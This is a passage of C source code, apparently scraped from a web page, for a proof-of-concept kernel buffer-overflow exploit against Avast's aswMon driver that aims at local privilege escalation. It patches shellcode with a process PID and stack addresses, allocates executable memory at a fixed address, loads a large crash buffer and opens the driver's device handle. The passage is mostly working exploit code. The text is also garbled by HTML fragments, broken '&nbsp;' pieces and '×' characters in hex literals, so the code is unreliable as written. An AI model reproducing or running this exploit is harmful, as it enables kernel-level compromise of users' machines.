           printf("===> Found : %s : %d\n\n", PEntry.szExeFile, PEntry.th32ProcessID);
           return PEntry.th32ProcessID;
        }
        //printf(   "\n               Process  :  PID\n");
        while(Process32Next(hTool32, &PEntry) != 0){
            if (strcasecmp(PEntry.szExeFile, name_Proc) == 0) {
                                           CloseHandle(hTool32);
                                           printf("===> Found : %s : %d\n\n", PEntry.szExeFile, PEntry.th32ProcessID);
                                           return PEntry.th32ProcessID;
                                           }
            //printf("===> Trouver : %s : %d\n", PEntry.szExeFile, PEntry.th32ProcessID);
        }
        printf("\n%s n'a pas ete trouve.", name_Proc);
        getch();
        exit(0);
    }

    void MajShellcode(char * ProcessName){
     &nb
    sp;   DWORD ProcessID;
         DWORD MagicWord = 0×41414141;
         int i;
        
         ProcessID = GetPidByName(ProcessName);
         for (i=0; i<sizeof(ShellcodeMaster); i++) {
             if (!memcmp(ShellcodeMaster+i, &MagicWord, 4)) {
                ShellcodeMaster[i] = (DWORD) ProcessID & 0x000000FF;
                ShellcodeMaster[i+1] = ((DWORD) ProcessID & 0x0000FF00) >> 8;
                ShellcodeMaster[i+2] = ((DWORD) ProcessID & 0x00FF0000) >> 16;
                ShellcodeMaster[i+3] = ((DWORD) ProcessID & 0xFF000000) >> 24;
                printf("Shellcode PID Uploaded !\n");
                return;
             }
         }
         printf("Shellcode PID NOT Uploaded :\'(\n");
         return;
    }

    void MajRealShellcode(){
         int i;
         DWORD MagicWord = 0×11111111;
        
         for (i=0; i<sizeof(ShellcodeMaster); i++) {
             if (!memcmp(ShellcodeMaster+i, &MagicWord, 4)) {
                ShellcodeMaster[i] = (DWORD) &RealShellcode & 0x000000FF;
                ShellcodeMaster[i+1] = ((DWORD) &RealShellcode & 0x0000FF00) >> 8;
                ShellcodeMaster[i+2] = ((DWORD) &RealShellcode & 0x00FF0000) >> 16;
                ShellcodeMaster[i+3] = (
    (    DWORD) &RealShellcode & 0xFF000000) >> 24;
                printf("Shellcode Redirect Uploaded !\n");
                return;
             }
         }
         printf("Shellcode Redirect NOT Uploaded :\'(\n");
         return;
    }

    int FindStack(){
         __asm__(
           "mov %eax, %esp\n\t"
           "leave\n\t"
           "ret\n\t"
           );
    }

    void MajRealStack(){
         int i;
         DWORD MagicWord = 0×22222222;
         DWORD StackLocation = FindStack();
        
         for (i=0; i<sizeof(ShellcodeMaster); i++) {
             if (!memcmp(ShellcodeMaster+i, &MagicWord, 4)) {
                ShellcodeMaster[i] = (DWORD) &StackLocation & 0x000000FF;
                ShellcodeMaster[i+1] = ((DWORD) &StackLocation & 0x0000FF00) >> 8;
                ShellcodeMaster[i+2] = ((DWORD) &StackLocation & 0x00FF0000) >> 16;
                ShellcodeMaster[i+3] = ((DWORD) &StackLocation & 0xFF000000) >> 24;
                printf("Shellcode Stack Uploaded !\n");
                return;
             }
         }
         printf("Shellcode NOT Uploaded :\'(\n");
         return;
    }

    void AfficherListeFichiers(void) {
        HANDLE hFind;
        WIN32_FIND_DATAW FindData;
        char Dossier[1024];
        
        // Change de dossier
        SetCurrentDirectory(Dossier);
        
        // DÈbut de la recherche
        hFind=FindFirstFileW(L"*.*", &FindData);
        if (hFind!=INVALID_HANDLE_VALUE)
        {
            // Si le fichier trouvÈ n'est pas un dossier mais bien un fichier, on affiche son nom
            printf("%ws\n",FindData.cFileName);
            // Fichiers suivants
            while (FindNextFileW(hFind, &FindData))
            {
                printf("%ws\n",FindData.cFileName);
            }
        }
        // Fin de la recherche
        FindClose(hFind);
    }

    int __cdecl main(int argc, char* argv[])
    {
        HANDLE hDevice = (HANDLE) 0xffffffff;
        DWORD NombreByte;
        DWORD InitVal=0;
        char welcome[1024], out[50];
        DWORD Crashing []={
            0x73d1dde9, 0×24135758, 0xcd62b301, 0x35a96b72,
            0x45c3745d, 0xcfae802b, 0xed77fbb8, 0xecc2f16d,
            0xa6409255, 0x5b608056, 0x7b2e40db, 0xc250e10c,
            0x284fc4b1, 0xbab9b00d, 0x2fce932c, 0x42d9380b,
            0x72b21bd3, 0x4646eb4c, 0xdfcc6996, 0x4060e991,
            0xce1fa555, 0xeda7ae0b, 0x4f918340, 0x90059feb,
            0xf4cf7bb7, 0x8b0c9a64, 0x9b99f867, 0xd673970a,
            0x591dbc4c, 0x2d54989b, 0xddb9c19d, 0x8121eaac,
            0x199b21f5, 0xc30a1e03, 0x7c618cb1, 0xeb3e06f0,
            0x7cebbd74, 0xaef8a969, 0x25cdcda9, 0xf47297c9,
            0×58855260, 0x9b494eaa, 0x0c11e290, 0x4f1a6361,
            0×75063159, 0xc791bf70, 0x3a1751db, 0xf439049a,
            0x83abe375, 0xba84ad33, 0x3ca8acac, 0x17d3fd7e,
            0x319c0280, 0xcd69a6c1, 0x3fdcdfe6, 0xc3903332,
            0x1377c51c, 0x1cd14365, 0xa98d77f0, 0xd5746f3f,
            0xb3cb7cb2, 0xddd2ecf4, 0x6cb9baa0, 0x4b0e045a,
            0x98b7c236, 0x1203e0e5, 0×32449810, 0xaeb428f7,
            0xa2e7e6e3, 0x3b0443af, 0x1145d62b, 0xaff5c263,
            0xc496b3d7, 0x0b1c45d9, 0x8a463e85, n> 0x041251c8,
            0x1341294d, 0xacc885c9, 0x03c3b5e7, 0x4cd36063,
            0xbeec4324, 0x313554a7, 0x3b202113, 0xe836e635,
            0x5d65c8bd, 0x8d52bae6, 0x24b3ba7f, 0x9b781fa7,
            0x7efa8335, 0x73e87501, 0x316fcbe4, 0xfcc446bc,
            0x3697162d, 0x5f706b56, 0x3d74846f, 0x57b41e55,
            0x44b39b19, 0x40e6bf38, 0xa1d3527c, 0x20f6b70c,
            0xa772ce22, 0x876cdf3b, 0xa948a3ad, 0x054c9fd6,
            0x6ea65a25, 0x432a376f, 0x4217baa1, 0xd38f0661,
            0x2c40d3d8, 0x33a62f9a, 0x5a8ef7d8, 0x4d07effa,
            0x8ba68789, 0x1441d661, 0xf2f6d48f, 0x77e5d2ae,
            0xcc69ac3e, 0x26cc9de9, 0xd7518e7e, 0xc568abea,
            0x21089cf3, 0xdc3c48a5, 0x6110d1b2, 0x39f65dc9,
            0xd0b8055d, 0xd8cab72c, 0x26be700a, 0x5f028b6c,
            0x1af4a25d, 0xbae98a7c, 0x1d5e94ed, 0xb743fb4a,
            0x274eaede, 0xe84bc6c6, 0xbcc3dd24, 0x47c6b5d5,
            0x3f5a530f, 0x4bbd205e, 0xe5ed455d, 0xc23908e3,
            0xa7255550, 0xfeee9e59, 0x8d91a28c, 0x27f1cd56,
            0xbb7d2468, 0x2e53ae6f, 0x3d8ea58a, 0x9832f31e,
            0x87aca912, 0xf5607f93, 0x67e4d74e, 0xcffd3adf,
            0x38bda32a, 0x1ace8bf1, 0x16ad790d, 0xe7b78a4a,
            0x6e4a4f52, 0xa963805f, 0xb44512ab, 0xaaff642a,
            0x68723e9a, 0x9cb006f2, 0x73439f5a, 0xcca9abc0,
            0x755ec72c, 0xb90d959c, 0x96f5fed2, 0x54821cac,
            0x6d3b9e97, 0x254fa473, 0xe5806bdf, 0x1d3fe779,
            0x5d824e9c, 0x0cba2490, 0x86dafdd4, 0xb84d19dd,
            0x1cf0ecc5, 0x73a4c777, 0x6545b564, 0x12fc70dd,
            0x58357dcd, 0×70524921, 0xa4bf0661, 0xd3630be2,
            0xb4f95085, 0x2f8e9f3f, 0x8fb2c303, 0x5d534373,
            0x330ed7be, 0x090a7fee, 0x70a0936f, 0x91bc5628,
            0x2ad2a9fb, 0x437d15d2, 0xcb860a99, 0x8bbf5d22,
            0x5188ce41, 0xf419337b, 0xfe338d2c, 0xf397167d,
            0xb79f4c9a, 0x982b7bd0, 0xeda0e308, 0×19079984,
            0×44506743, 0x08eb3bff, 0x0b2c7b5e, 0xfc12c449,
            0x122c18c3, 0xcb18effc, 0x65070b56, 0x5bbc5f36,
            0xba194a66, 0x1ac6b812, 0x4936b720, 0x3064f4d9,
            0xea85383a, 0x5669ab43, 0xbfb9b2be, 0x2c961814,
            0x2a16193f, 0x5310fc35, 0x2dcf5351, 0x8fb793bf,
            0x0b4f51df, 0x7f9c69f8, 0x76bbd7bc, 0xc2cd8ee9,
            0xdaded21e, 0xeeb83782, 0xa45e26a1, 0xa94133c2,
            0xaec536ad, 0xa6026a8c, 0xbcb5a191, 0xd7babca3,
            0xb2d31f46, 0x19511dc1, 0x21437e92, 0x0bfaa87e,
            0×32685945, 0x55016b49, 0x994f9293, 0x599f9653,
            0xc492d42b, 0xfa4d8907, 0x6c1e0416, 0x073e9847,
            0x9ceee897, 0x479dec42, 0x60f26898, 0xa0b37906,
            0x7f433088, 0xe617b52a, 0x30df4460, 0x9945c0da,
            0x5f4f9196, 0x5b3095ad, 0x41e4f285, 0x225b324a,
            0xe5f83ba7, 0xbadf8b56, 0xc732f28d, 0xaa94e0d7,
            0x0f9da105, 0×80936817, 0xa3b40d2e, 0xa7d5791c,
            0x10b0a9bb, 0x83b95622, 0×32872694, 0x7b1b3d10,
            0xe0e1adf8, 0×32512498, 0x6bc6ff89, 0x0d11fef7,
            0x3875c984, 0x5a31db0e, 0xdd1df94b, 0×61148636,
            0x7372b587, 0x8856950e, 0x4f0af062, 0xb49ea480,
            0x799ce35e, 0x23ecabd9, 0x137ee004, 0xdd17f948,
            0xf2026141, 0x8afd0e45, 0x1188ac9a, 0x0f87f038,
            0xee43edef, 0x982bf738, 0x78b3ca5f, 0x4d8345d3,
            0x613e2505, 0x16ab7e08, 0xa7e68888, 0xa59d234c,
            0×61655904, 0xbec0d39c, 0x3d0d18b0, 0x8eb7a653,
            0x6bd2ad6f, 0x3fa66b0f, 0x5951c36f, 0x8e5c4bed,
            0x087d3d72, 0x65fdb9b3, 0x7aa0c8a5, 0x26c78496,
            0x3a8946f1, 0xb65f63b2, 0xeacb180d, 0xbda32816,
            0x424f7b1e, 0x667fb713, 0xfe8d6f2c, 0x7f3711ca,
            0x477ecf54, 0xbf36b283, 0x92a7518e, 0xfa378a84,
            0x9ddc8f83, 0xc844b947, 0x3ef9ab12, 0xe892b5b4,
            0x101854b2, 0x8f45e397, 0xa1b134ed, 0x5c2a4d5c,
            0xa887258a, 0xbea01c90, 0xfb77c826, 0x08e87f98,
            0x6c7b0709, 0x1f27fe7d, 0xe9d4d75f, 0xd3ecbaee,
            0x961a35c6, 0x8317caf4, 0xc93141a0, 0x71c2fa12,
            0x79afe953, 0x7024a929, 0x5187beec, 0x439aa4c4,
     &n
    bsp;      0x1b5bf729, 0x20de52a2, 0x5afd531b, 0xcbc6d1dc,
            0x8a6c775d, 0×93823634, 0x31e3c106, 0x5c4756ec,
            0xb322318f, 0x8a8fe323, 0x7d8a483f, 0x538d06a5,
            0xd23e0864, 0x07739d15, 0x46845d65, 0xa90ed2a1,
            0x907709ae, 0x25c51a18, 0x7b361c60, 0xf7f12530,
            0xb5c8b862, 0x1e5579b7, 0x453fde63, 0x5854951c,
            0xb479e4b4, 0x0187185f, 0xe310f406, 0xc5ae83f5,
            0x385149c8, 0xe0538b56, 0x6ffa1c0f, 0x15a8c111,
            0xb901feb0, 0x5cb53fcf, 0x7b9596dd, 0xbedc1ead,
            0x6ea7517e, 0xf1c88cdb, 0x2cf213af, 0x67ebce96,
            0x458465ce, 0x6503c018, 0xf7d61a9b, 0xbb31a712,
            0xe0dc951b, 0x354a28a8, 0x51ecebf3, 0xdbf8e424,
            0xd71a0cd2, 0x708d5b40, 0xdd1cf833, 0xb4be28a4,
            0x41c589c0, 0x5d81889f, 0x97de9f7a, 0x43b18278,
            0x4c312b46, 0x2ec1048d, 0x438d30d9, 0xab7923d6,
            0xd36d6ed0, 0xb6165ede, 0×95369795, 0xd5b1b776,
            0x60fe0b11, 0x087563ae, 0xa709eacf, 0xededbbea,
            0xf134d8ea, 0x1e241ce6, 0x341248d6, 0x6c16117a,
            0x7517ff23, 0x4dfb2eda, 0x7cc84423, 0x96cf942d,
            0×32901498, 0xe3bc3a5d, 0x0b85bdb2, 0x7baf09ca,
            0x6c7b4c01, 0xb3a72934, 0x4d33e464, 0x7dc1cf69,
            0x166756c6, 0x08f5f62f, 0x3db6b309, 0xce886208,
            0x1daf5a03, 0xc724741a, 0xf052f4ed, 0x4297acad,
            0xdc6a5dfe, 0xd0c4a895, 0x97db4437, 0x6e227c97,
            0x05f4dab0, 0x13b4adf4, 0x0d8b71e6, 0x9ff6843d,
            0x0fdb8939, 0x58850dfd, 0x2b21f28e, 0x2603e115,
            0xb09ba646, 0xd6fe719b, 0xe87a9223, 0x18f3b642,
            0x4fb62852, 0xeda5dd40, 0x6e5dbbf4, 0x703a2f1f,
            0x4884a549, 0xb6b85046, 0xdbbb7868, 0xa38e09a3,
            0x66c6fa13, 0xea16a377, 0x1ced6fd3, 0x44a3e920,
            0xfe995619, 0x822d3af3, 0xe8399736, 0xa6ff023c,
            0x19b88da8, 0x9b26e290, 0xc6970f3e, 0x4607d070,
            0x7db5bfd9, 0xbdcc2cd7, 0x946faaf6, 0xfcd89b65,
            0x17712dee, 0x953a0c3f, 0xf1383334, 0xc32e8a92,
          &nb
    sp; 0xeb678cf4, 0xb5265c91, 0x10ec1b31, 0x6d134dc1,
            0x8ae8143e, 0x26ff3968, 0xf579d43c, 0x8f9d85f3,
            0x02fad6bf, 0x3a7be637, 0xeff5542c, 0x71cd227a,
            0x4345de8e, 0x5c9202c7, 0x388f640c, 0x0de7d2cd,
            0xe9b74263, 0xe443d4ef, 0x9cabf0e1, 0x810b8762,
            0x23c14d38, 0x296bd907, 0xdfc31794, 0x026b9455,
            0x7632bccd, 0x8dcf7332, 0x23dcc4c2, 0×32885977,
            0x548fdcc5, 0x9fca128a, 0x294fbc82, 0xf7bcd7db,
            0x9cdcc0a9, 0xe26aec68, 0x04c39cf4, 0x0a8d0d2b,
            0xf72bdf30, 0xff04366a, 0x07e7b40a, 0x9b3b9d18,
            0x859b4b85, 0x53a44769, 0x0b1366e3, 0x39f4c10b,
            0xb1ccbe45, 0x9d31874e, 0xa8e0a3a6, 0x98d4a7d0,
            0xc24240f5, 0x421301e0, 0×09137099, 0x48d2a2dd,
            0x3f0fdb4a, 0xe1a9eb43, 0x84199aff, 0x4eff2f35,
            0xd52f92fd, 0xe99cb709, 0xcb8fc9ce, 0x4cd97110,
            0x035f2194, 0x87e8e12d, 0xecd7a018, 0xff80434f,
            0x5ad4430c, 0×51015613, 0x153a3cf8, 0x8bbb9e84,
            0x31bc1b01, 0x986e7b5e, 0x4708de0c, 0xe51a3ef6,
            0xd279b566, 0x4054b421, 0xd794d868, 0x5e174bd2,
            0xc9480f43, 0x61e1ac80, 0x65c89d78, 0xcc461265,
            0x6f8099a7, 0x76596a5c, 0xe134710e, 0x6ec09d49,
            0x095b4232, 0x251f6d2c, 0xb61f7712, 0x6031640c,
            0x081bb50e, 0xabfcf1aa, 0x303d79f3, 0x4e3caaa9,
            0xf87540ed, 0xf067072c, 0xe1e7f3a1, 0x82dd570b,
            0x2110f555, 0x988cc833, 0x985002b4, 0xedd3b5c3,
            0xf952a2cd, 0x06159e37, 0x1ac3e607, 0xda6888dc,
            0x534a76c9, 0x2a7a4148, 0xb5433071, 0x392f077a,
            0x4f91ca6e, 0x0c7736e0, 0x780dd6ed, 0x626f3aa9,
            0x26db5cac, 0xd12bc3e6, 0x70d14be1, 0x0bc60171,
            0×97203228, 0x66463a8d, 0x0ac460d4, 0xdf1906b3,
            0x0d19058b, 0xaa96fa9a, 0x8b220888, 0xfad29e31,
            0x90049f60, 0xb44780ab, 0xe52554ea, 0xe97a3e9e,
            0x2142a187, 0x6ba5f497, 0xf43334a9, 0xf9fb1c87,
            0x3d1f1949, 0x064149d5, 0x2e39a1e9, 0x35669c1b,
            0x0345c538 "color:#0000ff">, 0x623002d5, 0xa280da3a, 0xd32bc66c,
            0x047c437f, 0x2b60c09c, 0x154931e8, 0x2b316b42,
            0xa97028bb, 0x1b26881f, 0x0d93499d, 0xa681e3d0,
            0x64aed3a1, 0xb904296b, 0x6e8ef9c5, 0xc029dbe4,
            0x4c1968ca, 0xacceed0c, 0x0f137d05, 0x71b80cdb,
            0xd0e3a334, 0xab958932, 0x336c6a26, 0×42626069,
            0x2a2d154b, 0x14347b3a, 0xac80cd31, 0x9e9708d5,
            0x1641542a, 0x25d2dd4e, 0x5c434b1d, 0x070569b9,
            0xf0f63b05, 0x2e8328a8, 0xd263cf7b, 0xea1a2370,
            0xcbc81d0b, 0xf2a0075b, 0x141c700e, 0×10628529,
            0x6cec92e5, 0x4aa5f3d6, 0x6c3d960f, 0x942d9d60,
            0x896d6d23, 0xa29ef00b, 0x0502a28d, 0x712f7787,
            0x5235ed70, 0x8945f3eb, 0x4f1ecbdd, 0xb5f457b9,
            0xe7327495, 0xbdc47980, 0x85bf54c1, 0xe054753d,
            0x42e6c82b, 0xb54389bb, 0xef5debf3, 0xcf310c8e,
            0x2a433c26, 0xf209dc9d, 0x8a869d03, 0×45961943,
            0x28f51bb9, 0x643e865c, 0xb410b2d1, 0xaf30a98c,
            0xa004bb79, 0x956b7c41, 0x13e3a21d, 0xca5f4efd,
            0xf13e81c1, 0x4fb74a1e, 0x2a033efb, 0x91ed2e36,
            0xb9bf8c57, 0xc1b65238, 0x2b3b3e0f, 0xbc02c76b,
            0xc56d0a7d, 0xb33685c2, 0x6619d068, 0x13ceb219,
            0x21e2d381, 0xbc04a013, 0xafc763ef, 0xc6c9651d,
            0x9139fb86, 0xdd6fe175, 0x5334d9d7, 0x4b39bc0e,
            0x42035a82, 0x91cba15e, 0xcf931d84, 0x739e2767,
            0x5a1c76fd, 0xd65cb444, 0x02c608e9, 0xc13aa613,
            0x5f9895ec, 0×05928739, 0xd960be14, 0xbc65f387,
            0xb40abdb8, 0x3833c113, 0x1fa8b468, 0x8e907e66,
            0xbca30fa5, 0xef539907, 0x3f130c64, 0xaf133b06,
            0x06d0d5c8, 0xe3e4f1df, 0x185f733d, 0x7ecf9d1e,
            0xdfea3362, 0x33bedbe3, 0xe9a15aed, 0x4aa68eeb,
            0x01e0aaf1, 0xb5ccf205, 0x9426c4cc, 0x3f80b9b4,
            0x017b584a, 0x7ac85b06, 0x4ca27f77, 0x7d8548a2,
            0x19025a74, 0x1d4d204c, 0x0cccb981, 0xf86a72e6,
            0x2a5ef939, 0x778bfe20, 0xf536a9e7, 0x82482d36,
            0x20a8484b, 0x8c08
    dd85, 0xc82a0739, 0xed52e038,
            0x4e6f5973, 0xd799c606, 0x87dd5c7f, 0x69db7ac2,
            0×56771978, 0xf682c73f, 0x40e5511c, 0xf373bc10,
            0xdecc0fa4, 0xf070df4e, 0x81b33f54, 0xf1d53816,
            0x2c2173e5, 0xae5a23d2, 0x0b9013fd, 0x9005857b,
            0x495aa603, 0x7d7b69b9, 0×80603698, 0xeedd2b37,
            0xaf7f72ea, 0xbe303f21, 0x0ea977f9, 0x0fa0708b,
            0xb5792aa6, 0x87fd2a7e, 0x2bda1cd6, 0x5df64225,
            0x216accb9, 0xc1808941, 0x582679b3, 0x46fbd44d,
            0xe2f76929, 0x548f6e51, 0x4ac3f5d8, 0xe52e62af,
            0x484110c2, 0x492fab5a, 0x2c7accea, 0x7488ca20,
            0xe36a2f99, 0xba1e3785, 0xefa467bc, 0xd4665fc8,
            0x2f5390e2, 0xfe450203, 0xbb624253, 0x551740a0,
            0x7d50b6c9, 0xe9d20aa0, 0x55e69c01, 0x6ab186ee,
            0x1c187ff3, 0x6ce6dff2, 0x120a6ce0, 0xf6c45fd2,
            0x5832b533, 0xb02e3027, 0x170d3041, 0x6f153144,
            0xad980d7f, 0x49f5d3ab, 0xcedca059, 0x3db83dc5,
            0x39c589c0, 0x986e3537, 0xc4d04f1d, 0xd71ee166,
            0×04620370, 0x35beb3cf, 0×39249667, 0x79915fe2,
            0xbe40d4da, 0xd0cab338, 0xdcb53b5a, 0xae884be7,
            0x6250a5df, 0x0949574e, 0x5d5321b8, 0x86d01394,
            0xd517473b, 0xe5f90827, 0x7a8ef843, 0×19869984,
            0x02e8d858, 0x71954f6f, 0x6a9e300b, 0xa8a50e6b,
            0xb935e9e2, 0x69f3e080, 0x3e51ad9b, 0xf485aa30,
            0x4195eb53, 0x2574950c, 0x87c2c9f1, 0x955cecec,
            0x2a89e224, 0x67aed18a, 0x8d473f2a, 0xa089d921,
            0×50197424, 0xa94cacbd, 0xe8cddf16, 0x806b7f0d,
            0xa27648b9, 0x99c702ad, 0x37db9034, 0xe7295b46,
            0xa4bf4bac, 0x43d214a3, 0x8d9bc127, 0x2f72faa5,
            0xf9143ef4, 0xf30bd7bf, 0x86b2517d, 0xb7a833d6,
            0x037c9b1f, 0x9459bc14, 0x0c78aa23, 0xe41cc7dc,
            0x4eda2ed2, 0x8c0a8f08, 0x85a8aff4, 0xae28e3ea,
            0x217269d6, 0x6d221bf7, 0x6f646c75, 0x8c04d0eb,
            0x7d389030, 0x1968785b, 0xe748befe, 0x7fb277a8,
            0xf340540e, 0xf5a6340f >, 0×47113529, 0x0c2eab43,
            0xd20d8b05, 0x5306c40e, 0x9c0c1ad3, 0x52a384db,
            0x26ad4373, 0×30872280, 0xc5ef9754, 0x098568fa,
            0xcbc632de, 0x9efa321a, 0x8466cae3, 0x156fa462,
            0x96716caa, 0x3e7cd39b, 0×27506529, 0x34cac20d,
            0x05958b0a, 0xe3b1708f, 0x258ff2e9, 0x913cc9cb,
            0xa5899577, 0xb9885e7b, 0xa559f53e, 0x48d99696,
            0xf2d0826d, 0x0be5f805, 0x385bb433, 0x174121eb,
            0x58bfd2bd, 0x4f4bc6ff, 0xc8fb45a6, 0xfac1da99,
            0xcbb0841f, 0xd33a2a83, 0xdb808b49, 0x110544d1,
            0x3656b868, 0x9527fb34, 0x75d35656, 0xf683f9cc,
            0xe756e3f6, 0x8cf742c1, 0x60c64989, 0x2af6cecc,
            0x0c70ddbb, 0x761077ee, 0xa5b3e47e, 0x52939e81,
            0xa476a7db, 0x02afdf28, 0x181e76a1, 0x094c8ae4,
            0x2035542d, 0xc47a48ab, 0x5f344e89, 0x6c0eaf8d,
            0xed89747c, 0x718af660, 0xed1386e1, 0xfe37f3d2,
            0x06817e6b, 0x600c9381, 0xbab81e8f, 0xe7a49506,
            0xb5070118, 0x2cf72a58, 0xde08c7f4, 0x109eead3,
            0x38ca65ba, 0xab924774, 0x26e006f2, 0x52fc4fc1,
            0x2c4453a1, 0x700a621d, 0x014dc1dc, 0x3aef70de,
            0x7c87331d, 0x89433add, 0xcbf6a8fc, 0x114f4794,
            0xea4e637f, 0x723c4b76, 0x47cc4f6a, 0×87445530,
            0xe83ceb38, 0x4d3e048e, 0×79081724, 0x4bf787fb,
            0x68943c66, 0x40e3d968, 0x6b103a30, 0xaadd17d4,
            0xb3f839e8, 0xac84edf7, 0x931d53b1, 0x0c4d2a0e,
            0x2f6ce387, 0xfed92391, 0x69ee2a6e, 0x48d7bb98,
            0x0ba1cb35, 0x63e12f67, 0x1ce3cb82, 0x099b3a46,
            0x5839b9a4, 0x7f7f4993, 0x59e4ecea, 0xeea5cccd,
            0x447dbf7f, 0xcd8626e1, 0x8d36d4b0, 0xac9e19ec,
            0x797ab5d7, 0x8434b658, 0xbcec7ef7, 0x682c6d93,
            0x762d7c86, 0xf38c8099, 0xafdec42c, 0xc43d09a6,
            0xe49d1217, 0x5e747fe1, 0x24788bb3, 0xaefc2937,
            0x1932f03c, 0x683917c0, 0x66aeed2b, 0x9b18cdd7,
            0x33f680a8, 0×26951569, 0xbaee16a8, 0x9e6c211f,
            0x2588853b, 0x9f46290f, 0x246ae851 ="color:#0000ff">, 0x18e204f6,
            0x4904ec8f, 0xd90aa3f4, 0xb32d3c27, 0x4c5dc284,
            0xbe4add7f, 0x43d09da9, 0x89c17c35, 0x073879e7,
            0xa563a12e, 0x8a89202c, 0xf15e9e1f, 0x351c54d9,
            0xa0c4fa14, 0x5709de8d, 0×39186894, 0x6d04f1d9,
            0xf11330f7, 0x81d6fb36, 0xa9ed69cb, 0xc6d525a7,
            0x7a95ed1d, 0x0e3cc7ca, 0xf22396d8, 0x454bc69f,
            0x220c180f, 0x413b363d, 0x3034f3b4, 0xd29d8cf2,
            0x54f88e88, 0×48701702, 0xd3bc5e71, 0x7d13dd70,
            0x3c60d934, 0x2f11eff3, 0xc0bfff93, 0xfa8a47f7,
            0x1ae1ec5d, 0xc5ebdc87, 0xe0f9d5ac, 0xf205ec31,
            0x45bf5abb, 0x364757d1, 0xe17d0824, 0x7285cdad,
            0x340f876f, 0xafd04fb5, 0x232b2753, 0x9ed7abb0,
            0xf6fa5267, 0xd0344840, 0x7e1908c7, 0xa7fa0e2a,
            0xa14a1f1c, 0x207f4d88, 0x3a8e8949, 0x0933e39b,
            0x49308b91, 0x744b2e05, 0x8dd691b5, 0x576003b6,
            0x74bf728b, 0x8ec344ea, 0x5c1a8d38, 0xba05b772,
            0xd025c49e, 0xbe9bde06, 0x791d3fde, 0xaac66591,
            0x4fd06cb7, 0x1eb57393, 0x3a132e66, 0x531bed33,
            0xc1161373, 0x584522c2, 0×96427532, 0x9b324e67,
            0x67fd675e, 0x1ca506c6, 0xfec4ce3f, 0xdfbd6229,
            0x1570062a, 0xaf2e42ce, 0x442de8ae, 0xe9da28c2,
            0xd8661dd6, 0xb1fbabfd, 0x5e3b5bd4, 0x5975312a,
            0x727c7734, 0x6edaf6d6, 0xc1c54cf1, 0x0a906333,
            0x81c044d6, 0x38ea12fe, 0x0c1bf270, 0×57818362,
            0x0908d11c, 0x0e5a84ec, 0xadc85814, 0x54e8aa92,
            0xd07c83f7, 0xcc71c686, 0x640e2cbb, 0x03c636a6,
            0x47737c01, 0x9ad77ee7, 0xd179e1a9, 0x8340bb15,
            0x489ed205, 0x40b54fa8, 0x7afb505e, 0xc04f8e16,
            0xb92981c6, 0x604af99f, 0x43c0fd25, 0x1d2b625f,
            0x13f4dcd7, 0xcf47b89b, 0x108d824a, 0×21236797,
            0x4cac84a5, 0xb33821ce, 0x542a9975, 0xf66135c2,
            0x30b9634a, 0x9bde472a, 0x50e29c43, 0x1224e64d,
            0x140aa049, 0x48c6d7eb, 0xf171704c, 0x80987f37,
            0x88da2c1d, 0xf337fbfe, 0xd52f414a, 0×765
    81549,
            0x75d22530, 0x293f3f41, 0x20b6cf21, 0xccd9f240,
            0x46ddeacd, 0x4e16d64e, 0x0e64fe89, 0x445de8d3,
            0x4d7983a6, 0x9f44fe8c, 0xf4e56281, 0xa7aad55b,
            0x07270a01, 0x77501d16, 0xf848ee54, 0x34f4ba27,
            0x244da047, 0x0ca62989, 0xbb5e2e05, 0x9612ca12,
            0x1b7c8cc7, 0xd2d672e6, 0x0caac1da, 0x1ae2cf8a,
            0x92bd47e9, 0xfeb1f194, 0xc0628cbd, 0xecc1a399,
            0x1a9f95f0, 0x29648b2b, 0x9c447a54, 0xad6d85e2,
            0x9bd983e7, 0x880f0eb1, 0xbea4a1a9, 0x3717e013,
            0x89e486dd, 0xe86bcc12, 0xc43fe5a5, 0xc50a72b4,
            0x396f4517, 0x2c8b865e, 0x3f022a7f, 0x0c5bc9bb,
            0x13fd077b, 0xcb6bd83d, 0x20c3e64b, 0x254e3a66,
            0xbcb22492, 0x57caa096, 0x8ba670d9, 0x547d5784,
            0xec8bf3f8, 0xf5b1ff55, 0×30620957, 0x43a3264a,
            0xdc6a0482, 0x270f2162, 0×15518268, 0xf4f3d923,
            0xfc6cdb9e, 0x91d3e097, 0xe49d4ba4, 0xe47a3b34,
            0xc18383a6, 0x5508af9a, 0xf2c8fcc8, 0xed417653,
            0xe3f4cf27, 0x6a777f65, 0xe9c3dae6, 0xfec2e74c,
            0x143f7e6d, 0xa8dc757c, 0xb8c48b07, 0x6a41964d,
            0x0994e2e4, 0x86ba5562, 0x4ebdb204, 0x6913dc92,
            0x3bd205a8, 0x2018395a, 0x804c5bb8, 0xa159fa18,
            0x7ccdfb1e, 0x146c6abc, 0x9c59a9ce, 0xe2f7d37d,
            0x699918e3, 0xde22536a, 0xfae6dd7c, 0x8a228eab,
            0xf657ae31, 0x97d59acb, 0xb1f6e1b7, 0xbc41be1c,
            0xc2572c95, 0x342f56a9, 0x349aeff3, 0xcbe3c7d9,
            0x080d46fe, 0x0e1d753c, 0xe4760d5c, 0x0cde715c,
            0x7d129f23, 0xab63fbbe, 0x9d734af8, 0xc2daebce,
            0x0619e8ee, 0x2c5b3a41, 0xd5db4193, 0x943fce43,
            0x0256feeb, 0x83a424bd, 0xe27f259b, 0x67ef724b,
            0x99c97ae1, 0x8bfa552e, 0x73e3191c, 0xe94365e5,
            0x92291d29, 0x7a28b911, 0x4ae8b691, 0xafba0345,
            0xbac0a0ba, 0x677713c2, 0x1a7fc599, 0x8978a9c1,
            0xe8f62f56, 0x58f7969a
            };

        DWORD ShellcodeToExecute;
        
        int choix;
        memset(welcome, 0×61, 100);
        welcome[100] = 0;

        ZeroMemory(out,sizeof(out));

        printf("Avast Kernel Buffer Overflow Vulnerability\nProof Of Concept…\n\n");
        getch();
        
        MajShellcode("LocalEscalation_Avast.exe");
        MajRealShellcode();
        MajRealStack();
        
        ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0×57520000, 0×10000, MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0×57520000, 0×10000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        
        memcpy((void*)0x57523c00, UpdateAswMon, sizeof(UpdateAswMon));
        memcpy((void*)0x57523c00+sizeof(UpdateAswMon), ShellcodeMaster, sizeof(ShellcodeMaster));
        
        printf("Connecting…    ");
        
        hDevice = CreateFile("\\\\.\\aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
